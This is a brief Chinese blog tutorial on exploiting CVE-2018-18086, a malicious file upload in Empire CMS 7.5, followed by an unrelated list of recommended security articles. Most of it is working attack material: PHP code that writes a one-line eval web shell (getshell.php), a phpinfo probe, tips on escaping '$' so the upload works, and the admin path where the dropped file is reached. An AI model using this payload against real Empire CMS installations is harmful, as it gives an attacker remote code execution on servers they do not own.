Empire(帝国)CMS 7.5 恶意文件上传-CVE-2018-18086

登录管理员页面:

这里经过多次测试,

直接上传一句话样本文件的话不生效(避坑),

并且$符需要做转义(避坑),否则:

方式1:

php 复制代码
<?php file_put_contents("getshell.php","<?php @eval(\$_POST[777]); ?>");?>

其中,函数file_put_contents():把内容写进一个文件里。(常用函数)

方式2:

php 复制代码
<?php file_put_contents("getphpinfo.php","<?php phpinfo(); ?>");?>

访问x.x.x.x/e/admin/getphpinfo.php:

相关推荐
白帽小阳11 分钟前
学术论文发表渠道科普,LNCS 系列会议的特点与检索情况分析
web安全·渗透测试·网络安全比赛·ctf备赛·lncs·ei 检索,学术论文,会议发表·计算机科学,宏观认知,学习路径,算法基础
珠***格16 分钟前
XGF10-Z-4典型接入方式解析:10千伏专变用户380伏多点分布式光伏如何并网?
网络·人工智能·分布式·安全·边缘计算
九硕智慧建筑一体化厂家25 分钟前
零触电高安全!盘山弯道直流感应照明提质增效改造方案
安全
盟接之桥39 分钟前
跨越数字鸿沟,重塑全球信任:盟接之桥EDI如何以长期主义赋能中国制造出海
网络·人工智能·安全·汽车·制造
绀目澄清5 小时前
私服网游云加速程序劫持流量排查与修复总结
windows·安全
超防局6 小时前
网络安全渗透测试常用工具详解
网络·安全·web安全
hz567898 小时前
手术示教及远程会诊系统一体化方案:赋能医院教学与精准诊疗
安全·音视频·实时音视频·信息与通信
运维大师8 小时前
【Linux运维极简教程】11-防火墙与安全加固
运维·安全
国科安芯9 小时前
抗辐射微控制器在卫星电源管理分系统中的控制架构与可靠性研究——基于AS32S601型MCU的星载能源系统智能化管理技术分析
网络·单片机·嵌入式硬件·安全·架构·系统架构·能源
Fnetlink19 小时前
Fnet 云网安 260717
网络·安全·网络安全